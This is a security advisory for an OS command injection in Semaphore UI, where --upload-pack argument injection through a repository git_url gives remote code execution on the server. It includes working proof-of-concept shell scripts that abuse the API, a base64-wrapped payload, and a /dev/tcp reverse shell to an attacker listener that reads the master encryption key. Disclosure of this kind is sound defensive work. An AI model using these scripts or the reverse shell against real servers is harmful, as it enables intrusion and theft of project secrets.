GHSA-xp7j-h7jc-4w8p: OS Command Injection
Summary An OS command injection in repository giturl handling lets any user holding the Manager or Owner role on any project (the normal project-collaborator roles) achieve remote code execution on the Semaphore server host. Using git's --upload-pack=<cmd> option, an attacker runs arbitrary commands. The command executes inside the main Semaphore server process (via the schedule commit-hash poller), so it runs even when jobs are configured for remote runners — bypassing runner isolation and exposing the master encryption key and every project's secrets. Reproducible on a default install (gitclient: cmdgit); no non-default configuration is required.
Details The repository giturl is attacker-controlled (HTTP body) and reaches exec.Command("git", ...) unvalidated. Two missing controls cause this:
1. giturl is never validated against option injection. Repository.Validate() (db/Repository.go, ~lines 138–156) validates the branch via ValidateGitBranch (db/gitbranch.go, which rejects a leading -), but performs no equivalent check on GitURL (only "non-empty"). ValidateRepository (db/Store.go, ~802–806) only checks the SSH key. CreateRepository (db/sql/repository.go, ~76–95) stores it verbatim. Because --upload-pack=... has no scheme:// and no leading /, GetType() (db/Repository.go, ~113–136) classifies it as RepositorySSH and GetGitURL(false) (~72–111) returns it raw/unchanged.
2. The git command is built with no -- separator. CmdGitClient.GetLastRemoteCommitHash (dblib/CmdGitClient.go, ~169–185) calls: c.output(r, GitRepositoryTmpPath, "ls-remote", r.Repository.GetGitURL(false), // attacker-controlled r.Repository.GitBranch) // "master" output (~79–93) → makeCmd (~21–60): exec.Command("git") (line ~27), cmd.Args = append(cmd.Args, args...) (line ~55). The resulting argv has no --: ["git", "ls-remote", "--upload-pack=<cmd>;true", "master"] git parses --upload-pack=... as an option; master becomes the (local-transport) repository operand; git then executes the upload-pack value through a shell (sh -c "<cmd> 'master'"), running <cmd>. This is intended git behavior — the fault is Semaphore passing untrusted data as argv. (The command runs even though git subsequently prints fatal: Could not read from remote repository and exits 128, and even though master is not a real path.)
Trigger — it fires in the server process. A project schedule with a repositoryid causes the scheduler to run git ls-remote to check for new commits. AddSchedule (api/projects/schedules.go, ~130–160; validateSchedulePayload ~86–118 validates only the cron format — it does not require the repo to be tied to the template). The schedule pool is started in the server process: runService in cli/cmd/root.go (CreateSchedulePool ~line 115, go schedulePool.Run() ~line 193), independent of remote-runner config. On each tick, ScheduleRunner.Run (services/schedules/SchedulePool.go, ~96–193, line ~117) calls tryUpdateScheduleCommitHash (~61–94) — before the HA de-dup lock (~145) — which loads the repo by repositoryid and calls GetLastRemoteCommitHash(). Refresh (~265–358, line 287) registers such schedules even when inactive, so deactivating does not stop it.
Entry points: POST /api/project/{id}/repositories (api/projects/repository.go:AddRepository, ~101–137) stores the payload; POST /api/project/{id}/schedules arms it. Both are gated by GetMustCanMiddleware(db.CanManageProjectResources) (api/router.go ~294/310/327), a permission held by ProjectManager/ProjectOwner (db/ProjectUser.go, ~22–27).
PoC Environment: the official semaphore v2.18.12 binary; git, python3, nc present. This PoC uses the default git client and nonadmincancreateproject: false; the attacker lowpriv is onboarded by the admin as a normal Manager (no special configuration).
Terminal 1 — config + users + server cd ~/PoC && mkdir -p tmp cat > config.json <<EOF { "sqlite":{"host":"$PWD/database.sqlite"},"dialect":"sqlite","tmppath":"$PWD/tmp", "port":":3000","interface":"127.0.0.1", "cookiehash":"$(head -c32 /dev/urandom|base64)","cookieencryption":"$(head -c32 /dev/urandom|base64)", "accesskeyencryption":"$(head -c32 /dev/urandom|base64)","gitclient":"cmdgit", "nonadmincancreateproject":false,"webhost":"http://127.0.0.1:3000/" } EOF ./semaphore user add --admin --login admin --name Admin --email admin@example.com --password 'Admin123!' --config config.json ./semaphore user add --login lowpriv --name Low --email low@example.com --password 'LowPriv123!' --config config.json ./semaphore server --config config.json Terminal 2 — attacker listener nc -lvnp 4444 Terminal 3 — admin onboards lowpriv as Manager, then lowpriv exploits cd ~/PoC
cat > onboard.sh <<'EOF' #!/usr/bin/env bash set -euo pipefail BASE="${BASE:-http://127.0.0.1:3000}" ADMIN="${ADMIN:-admin}"; ADMINPASS="${ADMINPASS:-Admin123!}"; MEMBER="${MEMBER:-lowpriv}" JAR=$(mktemp) curl -s -c "$JAR" -X POST "$BASE/api/auth/login" -H 'Content-Type: application/json' \ -d "{\"auth\":\"$ADMIN\",\"password\":\"$ADMINPASS\"}" >/dev/null PROJPID=$(curl -s -b "$JAR" -X POST "$BASE/api/projects" -H 'Content-Type: application/json' \ -d '{"name":"team-project","alert":false}' | python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])') USERID=$(curl -s -b "$JAR" "$BASE/api/users" | \ python3 -c "import sys,json;print(next(u['id'] for u in json.load(sys.stdin) if u['username']=='$MEMBER'))") curl -s -b "$JAR" -X POST "$BASE/api/project/$PROJPID/users" -H 'Content-Type: application/json' \ -d "{\"userid\":$USERID,\"role\":\"manager\"}" -o /dev/null rm -f "$JAR"; echo "[] $MEMBER is Manager of project $PROJPID" >&2; echo "$PROJPID" EOF chmod +x onboard.sh
cat > rce.sh <<'EOF' #!/usr/bin/env bash set -euo pipefail BASE="${BASE:-http://127.0.0.1:3000}"; LOGIN="${LOGIN:-lowpriv}"; PASS="${PASS:-LowPriv123!}" PROJPID="${PROJPID:?set PROJPID from onboard.sh}" CMD="$"; B64=$(printf '%s' "$CMD" | base64 -w0) GITURL="--upload-pack=bash -c \"echo $B64 | base64 -d | bash\";true" JAR=$(mktemp); jid(){ python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])'; } post(){ curl -s -b "$JAR" -X POST "$BASE$1" -H 'Content-Type: application/json' -d "$2"; } curl -s -c "$JAR" -X POST "$BASE/api/auth/login" -H 'Content-Type: application/json' \ -d "{\"auth\":\"$LOGIN\",\"password\":\"$PASS\"}" >/dev/null KID=$(post /api/project/$PROJPID/keys "{\"name\":\"k\",\"type\":\"none\",\"projectid\":$PROJPID}" | jid) BODY=$(python3 -c "import json,sys;print(json.dumps({'name':'r','projectid':$PROJPID,'giturl':sys.argv[1],'gitbranch':'master','sshkeyid':$KID}))" "$GITURL") RID=$(post /api/project/$PROJPID/repositories "$BODY" | jid) TID=$(post /api/project/$PROJPID/templates "{\"name\":\"t\",\"projectid\":$PROJPID,\"app\":\"bash\",\"playbook\":\"n.sh\",\"repositoryid\":$RID,\"type\":\"\"}" | jid) post /api/project/$PROJPID/schedules "{\"name\":\"s\",\"projectid\":$PROJPID,\"templateid\":$TID,\"repositoryid\":$RID,\"cronformat\":\" \"}" >/dev/null rm -f "$JAR"; echo "[] queued as lowpriv (Manager of $PROJPID): $CMD" EOF chmod +x rce.sh
PROJPID=$(./onboard.sh) ATTACKERIP=127.0.0.1 PROJPID=$PROJPID ./rce.sh "bash -i >& /dev/tcp/$ATTACKERIP/4444 0>&1"
Within ~60 s the schedule fires and the Semaphore server process connects back to the listener (Terminal 2), giving an interactive shell as the server user. Verify with id and cat ~/PoC/config.json (the server can read its own accesskeyencryption master key).
Impact - Type: OS command injection via argument injection — remote code execution. - Who is impacted: any Semaphore deployment running the default gitclient: cmdgit. The attacker only needs an authenticated account holding the Manager or Owner role on any project — the standard collaborator roles. (If nonadmincancreateproject is enabled, literally any authenticated user qualifies, since they can self-create a project and become its Owner. Global admins always qualify.)
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
go/github.com/semaphoreui/semaphoreto a version that resolves this vulnerability.Fixed in 0.0.0-20260704181911-7e8a9434bd81
Event History
Frequently Asked Questions
Who can exploit this issue?
Any user with the Manager or Owner role on any project can exploit it. These are normal project-collaborator roles, so exploitation does not require server administration privileges.
Does using remote runners protect the Semaphore server from this vulnerability?
No. The injected command runs in the main Semaphore server process through the schedule commit-hash poller, even when jobs are configured to use remote runners. This bypasses runner isolation and can expose the master encryption key and secrets for every project.
Is a non-default configuration required for exploitation?
No. The issue is reproducible on a default installation using git_client: cmd_git; no non-default configuration is required.
What repository input is used to trigger command execution?
An attacker controls the repository git_url and can use Git's --upload-pack=<cmd> option to cause arbitrary command execution. The git_url is checked only for being non-empty and is not validated against option injection.